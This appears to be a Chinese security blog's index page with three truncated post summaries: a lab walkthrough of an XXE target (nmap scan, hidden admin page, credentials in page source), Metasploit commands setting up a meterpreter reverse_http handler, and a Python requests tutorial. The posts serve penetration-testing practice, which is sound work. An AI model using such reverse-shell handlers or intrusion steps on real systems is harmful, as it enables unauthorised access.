摘要：###信息收集 扫描目标主机，ip为192.168.88.154 nmap扫描结果 存在robots.txt文件。直接访问其中的admin.php显示404，加一层目录访问/xxe/admin.php，拿到一个登录页面。在页面源码里面有提示账号密码 W00t/W00t，但是登录提示Maybe Lat 阅读全文

摘要：msf5 > use exploit/multi/handler [*] Using configured payload windows/meterpreter/reverse_http msf5 exploit(multi/handler) > set payload windows/meter 阅读全文

摘要：####思路 用到的模块 requests模块 requests模块：python中原生的一款基于网络请求的模块，功能非常强大，简单便捷，效率极高。 作用：模拟浏览器发请求。 如何使用：requests模块的编码流程 - 指定url - UA伪装 - 请求参数的处理 - 发起请求 - 获取响应数据 阅读全文